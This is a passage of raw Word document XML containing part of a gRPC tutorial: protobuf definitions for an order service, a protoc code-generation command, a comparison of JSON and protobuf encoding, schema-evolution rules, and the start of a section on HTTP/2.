        <w:t xml:space="preserve">  rpc GetOrder(GetOrderRequest) returns (Order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6C8CE9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc ListOrders(ListOrdersRequest) returns (ListOrdersResponse);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5266703B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc StreamOrderUpdates(StreamRequest) returns (stream OrderUpdate);  // Server streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC5A01" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C45B8A6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="69C97B70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Message definitions (the data structures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71916E4C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message CreateOrderRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7341480D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string customer_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A761109" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  repeated OrderItem items = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7858EB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Address shipping_address = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7F042" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PaymentMethod payment = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8F95A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412E8AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="14754623" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message CreateOrderResponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721067FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string order_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A71FC05" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  OrderStatus status = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE4521" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  google.protobuf.Timestamp created_at = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470EB976" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEDBFBC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2DE14DF0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message Order {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777C455" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B3CA0C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string customer_id = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745AE7AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  repeated OrderItem items = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76D653" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  double total = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10091F5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  OrderStatus status = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49054498" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  google.protobuf.Timestamp created_at = 6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A256730" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F492D3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3CB18231" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message OrderItem {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC6DF7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string product_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2373603E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string name = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3FF741" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  int32 quantity = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD3797" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  double price = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A7C2C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398AA41D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="16C6B764" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>enum OrderStatus {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60763C69" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ORDER_STATUS_UNSPECIFIED = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8741E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PENDING = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B72ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  CONFIRMED = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C4A147" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  SHIPPED = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126BD699" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  DELIVERED = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14543A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  CANCELLED = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF01FCD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23010531" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7930FD3E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message Address {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6770288F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string street = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0EBA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string city = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED99F1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string state = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37B3CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string zip = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9A60D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string country = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52640DC0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63704E19" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code generation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6670FCA2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798ADBE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t># Generate client and server code from .proto file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574E1229" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protoc --go_out=. --go-grpc_out=. order_service.proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691B9B50" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="632245E5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t># Generates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0495E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>#   order_service.pb.go         (message types)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B7990" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>#   order_service_grpc.pb.go    (client stub + server interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052337B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protobuf binary encoding (why it's fast and small):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C6BDA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646248E9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>JSON encoding of an order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993EDC2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  {"id":"abc123","customer_id":"cust-42","total":99.99,"status":"PENDING"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B150086" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → 72 bytes (text, field names repeated, verbose)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1CE5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="29170D79" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Protobuf encoding of the same order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746C9134" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 1 (string "abc123"): [tag:0x0A][length:6][data:616263313233]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B6537" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 2 (string "cust-42"): [tag:0x12][length:7][data:...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4436A30E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 4 (double 99.99): [tag:0x21][8 bytes IEEE754]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A3323" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Field 5 (enum 1): [tag:0x28][value:0x01]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B28CADD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → ~30 bytes (binary, field tags are 1-2 bytes, no field names)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB5195" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="02759E0B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Compression: ~60% smaller than JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753CC876" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Parse speed: ~10x faster than JSON (no text parsing, no field name matching).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3471D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Schema evolution (backward/forward compatibility):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252BF1D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E97177" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Version 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2AA17" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833EF40" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E3B40" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string name = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3C74A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string email = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23612ED6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E901F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7AFBE0EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Version 2 (backward compatible additions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF10B57" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CCC44" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7245275D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string name = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620412BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  string email = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FFBE2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string phone = 4;          // NEW — old clients ignore unknown fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047EE66C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Address address = 5;       // NEW — old clients ignore it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135A5E22" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Field 3 NOT removed — old clients still send/expect it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9E7DE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA0D4E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1B13ECDF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rules for safe evolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672E9C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ ADD new fields (with new field numbers) — old clients ignore them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F24B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ DEPRECATE fields (stop using, but don't remove number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFC3B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> NEVER reuse a field number (old data with that number would be misinterpreted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F41168" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> NEVER change a field's type (wire format changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C9907" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 HTTP/2 Features (Why gRPC Uses It)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9757A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A0DF7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HTTP/1.1 limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6790C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - One request at a time per TCP connection (head-of-line blocking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471EA3AA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Text headers (verbose, repeated on every request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D799695" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
